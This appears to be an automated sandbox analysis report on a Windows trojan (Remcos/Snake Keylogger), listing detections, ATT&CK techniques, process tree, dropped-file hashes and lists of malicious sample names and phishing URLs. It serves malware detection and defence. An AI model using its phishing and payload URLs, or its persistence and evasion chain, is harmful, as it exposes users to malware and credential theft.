Source: Yara match | File source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2269652870.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2314110382.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7620, type: MEMORYSTR
MITRE ATT&CK Matrix

Tactics (columns of the matrix): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact

Techniques flagged for this sample, by tactic (the number is the figure shown beside the technique in the matrix):

Execution: Scheduled Task/Job (1)
Persistence: Scheduled Task/Job (1); DLL Side-Loading (1)
Privilege Escalation: Process Injection (311); Scheduled Task/Job (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (31); Process Injection (311); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (32); DLL Side-Loading (1)
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Collection: Archive Collected Data (11)
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13)

No techniques are flagged under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact; the remaining cells of the matrix are the unflagged template entries.
Behavior Graph (ID: 1583466, Sample: file.exe, Startdate: 02/01/2025, Architecture: WINDOWS, Score: 100)

Contacted hosts: reallyfreegeoip.org; checkip.dyndns.org; checkip.dyndns.com
Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 8 other signatures
reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)

Process tree:

file.exe (started)
  dropped: C:\Users\user\AppData\Roaming\aVmZDnwW.exe (PE32); C:\Users\...\aVmZDnwW.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp9FE1.tmp (XML); C:\Users\user\AppData\Local\...\file.exe.log (ASCII)
  signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Uses schtasks.exe or at.exe to add and modify task schedules; 3 other signatures
  powershell.exe (started)
    signatures: Loading BitLocker PowerShell Module
    WmiPrvSE.exe (started)
    conhost.exe (started)
  RegSvcs.exe (started)
    network: checkip.dyndns.com 193.122.130.0, ports 49724, 49729, 49732, ORACLE-BMC-31898, US, United States; reallyfreegeoip.org 188.114.97.3, ports 443, 49725, 49728, CLOUDFLARENET, US, European Union
    cmd.exe (started)
      conhost.exe (started)
      choice.exe (started)
  schtasks.exe (started)
    conhost.exe (started)
aVmZDnwW.exe (started)
  signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions
  RegSvcs.exe (started)
    cmd.exe (started)
      conhost.exe (started)
      choice.exe (started)
  schtasks.exe (started)
    conhost.exe (started)

Source | Detection | Scanner | Label
file.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\aVmZDnwW.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\aVmZDnwW.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | false | | high
checkip.dyndns.com | 193.122.130.0 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org | RegSvcs.exe memory dumps | false | | high
http://checkip.dyndns.org | RegSvcs.exe memory dumps | false | | high
http://checkip.dyndns.com | RegSvcs.exe memory dumps | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | file.exe, RegSvcs.exe, aVmZDnwW.exe memory dumps | false | | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | file.exe, aVmZDnwW.exe.0.dr | false | | high
http://checkip.dyndns.org/q | file.exe, RegSvcs.exe, aVmZDnwW.exe memory dumps | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | RegSvcs.exe memory dumps | false | | high
http://reallyfreegeoip.org | RegSvcs.exe memory dumps | false | | high
https://reallyfreegeoip.org/xml/ | file.exe, RegSvcs.exe, aVmZDnwW.exe memory dumps | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1583466
                                          Start date and time:2025-01-02 20:18:40 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 9s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:21
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:file.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@26/12@2/2
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 246
                                          • Number of non-executed functions: 41
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.190.160.14, 40.126.32.138, 20.190.160.20, 20.190.160.22, 40.126.32.68, 40.126.32.140, 40.126.32.72, 40.126.32.133, 184.28.90.27, 13.107.246.45, 52.149.20.212
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                          • Execution Graph export aborted for target RegSvcs.exe, PID 7276 because it is empty
                                          • Execution Graph export aborted for target RegSvcs.exe, PID 7620 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • VT rate limit hit for: file.exe
Time | Type | Description
14:19:41 | API Interceptor | 1x Sleep call for process: file.exe modified
14:19:43 | API Interceptor | 12x Sleep call for process: powershell.exe modified
14:19:45 | API Interceptor | 1x Sleep call for process: aVmZDnwW.exe modified
14:19:45 | API Interceptor | 150x Sleep call for process: RegSvcs.exe modified
20:19:43 | Task Scheduler | Run new task: aVmZDnwW path: C:\Users\user\AppData\Roaming\aVmZDnwW.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | dGhlYXB0Z3JvdXA=-free.exe | malicious | Unknown | /api/get/free
188.114.97.3 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.rgenerousrs.store/o362/
188.114.97.3 | A2028041200SD.exe | malicious | FormBook | www.beylikduzu616161.xyz/2nga/
188.114.97.3 | Delivery_Notification_00000260791.doc.js | malicious | Unknown | radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
188.114.97.3 | ce.vbs | malicious | Unknown | paste.ee/d/lxvbq
188.114.97.3 | Label_00000852555.doc.js | malicious | Unknown | tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
188.114.97.3 | PO 20495088.exe | malicious | FormBook | www.ssrnoremt-rise.sbs/3jsc/
188.114.97.3 | QUOTATION_NOVQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/zWkbOqX7/download
188.114.97.3 | http://kklk16.bsyo45ksda.top | malicious | Unknown | kklk16.bsyo45ksda.top/favicon.ico
193.122.130.0 | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.130.0 | MT Eagle Asia 11.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Order_12232024.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | rTTSWIFTCOPIES.exe | malicious | MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | 66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | 87h216Snb7.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | dP5z8RpEyQ.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | 188.114.96.3
reallyfreegeoip.org | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | file.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
reallyfreegeoip.org | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.97.3
reallyfreegeoip.org | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
reallyfreegeoip.org | Dotc67890990.exe | malicious | Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134
reallyfreegeoip.org | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
checkip.dyndns.com | PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | 158.101.44.242
checkip.dyndns.com | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | file.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
checkip.dyndns.com | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 193.122.130.0
checkip.dyndns.com | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.247.73
checkip.dyndns.com | ZOYGRL1ePa.exe | malicious | Agent Tesla, AgentTesla | 158.101.44.242
checkip.dyndns.com | Dotc67890990.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.157.254
CLOUDFLARENETUS | PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | 188.114.96.3
CLOUDFLARENETUS | https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok | malicious | HTMLPhisher | 104.18.142.119
CLOUDFLARENETUS | https://ntta.org-pay-u5ch.sbs/us/ | malicious | Unknown | 104.18.26.193
CLOUDFLARENETUS | https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html | malicious | HTMLPhisher | 172.66.0.235
CLOUDFLARENETUS | https://bit.ly/3W6tVJJ?BRK=80HiTWCpll | malicious | Unknown | 172.66.0.227
CLOUDFLARENETUS | https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63 | malicious | HTMLPhisher | 104.26.9.117
CLOUDFLARENETUS | https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml | malicious | HTMLPhisher | 104.26.9.117
CLOUDFLARENETUS | https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml | malicious | HTMLPhisher | 104.26.9.117
ORACLE-BMC-31898US | PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | Hilix.mips.elf | malicious | Mirai | 140.238.15.187
ORACLE-BMC-31898US | file.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 193.122.130.0
ORACLE-BMC-31898US | ZOYGRL1ePa.exe | malicious | Agent Tesla, AgentTesla | 158.101.44.242
ORACLE-BMC-31898US | INQUIRY.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.6.168
ORACLE-BMC-31898US | armv4l.elf | malicious | Mirai | 129.148.142.134
ORACLE-BMC-31898US | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | PO_4027_from_IC_Tech_Inc_6908.exe | malicious | MassLogger RAT | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | image.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | DHL DOC INV 191224.gz.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | NL Hybrid.exe | malicious | Titanium Proxy, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | NL Hybrid.exe | malicious | Titanium Proxy, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | file.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | RtU8kXPnKr.exe | malicious | Quasar | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | PO_KB#67897.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.97.3
                                          No context
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1039
                                          Entropy (8bit):5.353332853270839
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
                                          MD5:A4AF0F36EC4E0C69DC0F860C891E8BBE
                                          SHA1:28DD81A1EDDF71CBCBF86DA986E047279EF097CD
                                          SHA-256:B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
                                          SHA-512:A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e
                                          Process:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:8B21C0FDF91680677FEFC8890882FD1F
                                          SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                          SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                          SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:8B21C0FDF91680677FEFC8890882FD1F
                                          SHA1:E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
                                          SHA-256:E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
                                          SHA-512:1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2232
                                          Entropy (8bit):5.379460230152629
                                          Encrypted:false
                                          SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZLiUyus:fLHyIFKL3IZ2KRH9Oug4Xs
                                          MD5:CFEF7595F28D05D6AC10633476D32EDC
                                          SHA1:EA78EB2879845B0C15EFC69B706E1A35672486F4
                                          SHA-256:E3ABF5038BD35795A993A120EFF207D9D5DF914525E1FA7C229807A74DA35E5D
                                          SHA-512:E1F56D4B92D90BB0ABBB82B315C65DE6785D8742B407E493F813AC55C15382453575B5BB9509709CC5A7F599707ABFBEAE5022A00B0B0E2856FFC3BAE9B98CAC
                                          Malicious:false
                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
